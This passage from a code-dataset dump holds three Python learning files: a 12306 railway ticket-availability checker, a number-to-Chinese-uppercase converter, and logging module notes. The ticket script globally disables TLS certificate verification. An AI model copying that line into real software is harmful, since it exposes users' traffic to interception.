0.536392092704773, "avg_line_length": 28.060606002807617, "blob_id": "0ec44ec4d43063b94c8f76b441bbd505c95a9b4e", "content_id": "8a762136f96b42315bba713be501627bc4be5f52", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5189, "license_type": "no_license", "max_line_length": 132, "num_lines": 165, "path": "/12306/fuck12306_check_seat.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# author : @jiawenlong\n\nimport urllib2\nimport ssl\nfrom json import loads\nimport sys\nfrom fuck12306_get_city import get_city_code # 查询城市信息,返回城市代码\n\nssl._create_default_https_context = ssl._create_unverified_context # 忽略证书认证\n\n\n# start_station = raw_input('请输入始发站:')\n# ended_station = raw_input('请输入终点站:')\n# train_date = raw_input('请输入乘车日期:')\n# train_name = raw_input('请输入车次或者不输入:')\n# from_station = get_city_code(start_station)\n# to_station = get_city_code(ended_station)\n\nfrom_station = get_city_code(\"北京\")\nto_station = get_city_code(\"平顶山\")\ntrain_date = '2017-12-10'\ntrain_name = 'K261'\n# train_date = '2017-11-25'\n\n# 城市 https://kyfw.12306.cn/otn/resources/js/framework/station_name.js?station_version=1.9027\n# 请求的 火车票 的地址 包含了 始发站 目的站 乘车时间\nticket = 'https://kyfw.12306.cn/otn/leftTicket/query?leftTicketDTO.train_date=' + train_date + \\\n '&leftTicketDTO.from_station=' + from_station + \\\n '&leftTicketDTO.to_station=' + to_station + \\\n '&purpose_codes=ADULT'\n\n\ndef getSeat():\n html = urllib2.urlopen(ticket).read()\n dict = loads(html)\n # print dict['messages'][0]\n if dict['messages']:\n print dict['messages'][0]\n sys.exit()\n else:\n return dict['data']['result']\n\n\ndef get_train(**kwargs):\n trains = kwargs\n return trains\n\n\ndef check_seat():\n global train_name\n \"\"\"暂时只打印一个车次的 我们需要的 信息\"\"\"\n for i in getSeat():\n split_list = i.split('|')\n train = get_train(ticket_name=split_list[3], start_time=split_list[8], end_time=split_list[9],\n live_time=split_list[10],\n soft_sleeper=split_list[23], no_seat=split_list[26], hard_sleeper=split_list[28],\n hard_seat=split_list[29], second=split_list[30], first=split_list[31], buss=split_list[32])\n # print train['soft_sleeper']\n # print train['ticket_name']\n if train_name:\n train_name = train_name.upper()\n if train_name == train['ticket_name']:\n print train['ticket_name']\n print \"订票\"\n else:\n continue\n else:\n train_name = train['ticket_name']\n print \"没有车次信息,默认为: \", train_name\n print \"订票\"\n sys.exit()\n #\n # break\n\n# check_seat()\n\n\n# def getSeat():\n# # print my_ticket\n# html = urllib2.urlopen(ticket).read()\n# # print(html)\n# # print(type(html))\n# # print(loads(html))\n# dict = loads(html)\n# # print dict['data']['result']\n# # print dict\n# return dict['data']['result']\n#\n# def print_seat():\n# \"\"\"暂时只打印一个车次的 我们需要的 信息\"\"\"\n# train = {}\n# for i in getSeat():\n# split_list = i.split('|')\n# train = get_train(ticket_name=split_list[3], start_time=split_list[8], end_time=split_list[9], live_time=split_list[10], \\\n# soft_sleeper=split_list[23], no_seat=split_list[26], hard_sleeper=split_list[28], \\\n# hard_seat=split_list[29], second=split_list[30], first=split_list[31], buss=split_list[32])\n#\n# # train['ticket_name'] = split_list[3]\n# # train['start_time'] = split_list[8]\n# # train['end_time'] = split_list[9]\n# # train['live_time'] = split_list[10]\n# # train['soft_sleeper'] = split_list[23]\n# # train['no_seat'] = split_list[26]\n# # train['hard_sleeper'] = split_list[28]\n# # train['hard_seat'] = split_list[29]\n# # train['second'] = split_list[30]\n# # train['first'] = split_list[31]\n# # train['buss'] = split_list[32]\n# # for key in train:\n# # print key, train[key]\n# # yield train\n#\n# # print \"车次:\", split_list[3],\n# # print \"\\t开车时间:\", split_list[8],\n# # print \"\\t到站时间:\", split_list[9],\n# # print \"\\t历时时间:\", split_list[10],\n# # print \"\\t软卧:\", split_list[23],\n# # print \"\\t无座:\", split_list[26],\n# # print \"\\t硬卧:\", split_list[28],\n# # print \"\\t硬座:\", split_list[29],\n# # print \"\\t二等座:\", split_list[30],\n# # print \"\\t一等座:\", split_list[31],\n# # print \"\\t商务座:\", split_list[32]\n#\n# # break\n#\n\n# getList()\n# [1] 预订\n# [2] 240000K4730C\n# [3] K473 车次\n# [4] BJP\n# [5] KMM\n# [6] BJP\n# [7] BFF\n# [8] 16:16 开车时间\n# [9] 05:57 到站时间\n# [10] 13:41 经过时间\n# [11] Y\n# [12] ZiGu2UrItHRf0TWQL%2Fpgp35uRTKLjh%2BfVFvsFlM1cUCXe2Knv5CIDrPScyk%3D\n# [13] 20171124\n# [14] 3\n# [15] PA\n# [16] 01\n# [17] 14\n# [18] 0\n# [19] 0\n# [20]\n# [21]\n# [22]\n# [23] 无 软卧\n# [24]\n# [25]\n# [26] 有 无座\n# [27]\n# [28] 无 硬卧\n# [29] 无 硬座\n# [30] 二等座\n# [31] 一等座\n# [32] 商务座\n# [33]\n# [34] 10401030\n# [35] 1413\n" }, { "alpha_fraction": 0.2653525471687317, "alphanum_fraction": 0.2994692921638489, "avg_line_length": 14.891566276550293, "blob_id": "27259a04208993a17e5270b6865690c8561eec0f", "content_id": "4a288cb935489fcf2df6fe3d3e5d831f71b823ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1405, "license_type": "no_license", "max_line_length": 44, "num_lines": 83, "path": "/python学习/数字转中文大写.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2017-12-26\n\n__author__ = '@jiawenlong'\n\nimport re\n\nbig = {\n '1': '壹',\n '2': '贰',\n '3': '叁',\n '4': '肆',\n '5': '伍',\n '6': '陆',\n '7': '柒',\n '8': '捌',\n '9': '玖',\n '0': '零'\n}\ndw = {\n -1: '',\n 0: '',\n 1: '元',\n 2: '拾',\n 3: '佰',\n 4: '仟',\n 5: '万',\n 6: '拾',\n 7: '佰',\n 8: '仟',\n 9: '亿'\n}\nxs = {\n 0: '',\n 1: '角',\n 2: '分',\n 3: '里',\n 4: ''\n}\n\n\ndef zhongwen(s):\n end = ''\n if re.findall('\\.', s):\n z, f = s.split('.')\n wei = len(z)\n for i in z:\n if i == '0':\n end = end + ''\n else:\n end = end + big[i] + dw[wei]\n wei -= 1\n\n if len(f) >= 4:\n f = f[0:3]\n wei = 1\n else:\n wei = 1\n\n for i in f:\n end = end + big[i] + xs[wei]\n wei += 1\n print(end)\n else:\n wei = len(s)\n for i in s:\n if i == '0':\n end = end + ''\n else:\n end = end + big[i] + dw[wei]\n wei -= 1\n end = end + \"圆整\"\n print(end)\n\n\nif __name__ == '__main__':\n num = input('请输入要转换的数字_>:')\n if num:\n zhongwen(num)\n else:\n print(\"请输入数字!!\")\n" }, { "alpha_fraction": 0.6402662396430969, "alphanum_fraction": 0.6489184498786926, "avg_line_length": 29.049999237060547, "blob_id": "fb3c7a378ee4ab9cdadbc9ad1f9db5c82fb15e3c", "content_id": "d85ba8077c8608481ad04afaa248cd375c829cf7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3527, "license_type": "no_license", "max_line_length": 111, "num_lines": 100, "path": "/python学习/模块/模块_logging.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-08\n\n__author__ = '@jiawenlong'\n\nimport logging\n\n# One\n# %(asctime)s 将日志的时间构造成可读的形式,默认情况下是精确到毫秒,如 2018-10-13 23:24:57,832\n# 可以额外指定 datefmt 参数来指定该变量的格式\n# %(name) 日志对象的名称\n# %(filename)s 不包含路径的文件名\n# %(pathname)s 包含路径的文件名\n# %(funcName)s 日志记录所在的函数名\n# %(levelname)s 日志的级别名称\n# %(levelno)s 数字形式的日志级别名称\n# %(message)s 具体的日志信息\n# %(lineno)d 日志记录所在的行号\n# %(pathname)s 完整路径\n# %(process)d 当前进程ID\n# %(processName)s 当前进程名称\n# %(thread)d 当前线程ID\n# %(threadName)s 当前线程名称\n\n\n# # 日志级别的配置\n# logging.basicConfig(level=logging.DEBUG,\n# format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n# datefmt='%a,%d %b %Y %H:%M:%S',\n# # 周,天 月 年 时间\n# filename='test.log',\n# filemode='aw')\n#\n# logging.debug(' this is debug message')\n# logging.info(' this is info messages')\n# logging.warning(' this is warning messages')\n# logging.error(' this is error messages')\n# logging.critical(' this is critical messages')\n\n\n# # Two\n# logger = logging.getLogger(\"aaa\")\n# # logger = logging.getLogger() # 创建日志对象\n# logger.setLevel(logging.DEBUG)\n# fh = logging.FileHandler('test.log') # 创建一个handler,用于写入日志文件,文件对象\n# ch = logging.StreamHandler() # 创建一个handler 用于输出到屏幕,流对象\n# formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') # 输出格式对象\n#\n# # 给文件对象和流对象创建输出格式\n# fh.setFormatter(formatter)\n# ch.setFormatter(formatter)\n#\n# # 添加输出对象到日志对象\n# logger.addHandler(fh)\n# logger.addHandler(ch)\n#\n# # 调用\n# logger.debug(' this is debug message')\n# logger.info(' this is info messages')\n# logger.warning(' this is warning messages')\n# logger.error(' this is error messages')\n# logger.critical(' this is critical messages')\n\n\n# 第二次学习\n\n# logging.basicConfig(\n# level=logging.DEBUG,\n# format='%(asctime)s %(filename)s %(name)s [行号:%(lineno)d] %(levelname)s %(message)s %(levelno)s ',\n# # 以上圆括号中的变量不能改变,'行号' 是可以修改的\n# datefmt='%a %d %b %Y %H:%M:%S',\n# # datefmt 格式设置 datefmt=\"%d-%M-%Y %H:%M:%S\"\n# # filename='test.log',\n# # filemode='a+'\n# )\n# logging.debug('This is logiging.debug')\n# logging.info('This is logiging.info')\n# logging.warning('This is logiging.warning')\n# logging.error('This is logiging.error')\n# logging.critical(\"This is logging.critical\")\n\nlogger = logging.getLogger()\nfile_h = logging.FileHandler('test.log')\nscen_h = logging.StreamHandler()\nformatter = logging.Formatter('%(asctime)s %(filename)s %(name)s [代码行号:%(lineno)d] %(levelname)s %(message)s')\n\nfile_h.setFormatter(formatter)\n# scen_h.setFormatter(formatter)\n\nlogger.addHandler(file_h)\nlogger.addHandler(scen_h)\n\nlogger.setLevel(logging.DEBUG)\nlogger.debug('This is logiging.debug')\nlogger.info('This is logiging.info')\nlogger.warning('This is logiging.warning')\nlogger.error('This is logiging.error')\nlogger.critical(\"This is logging.critical\")\n" } ]
48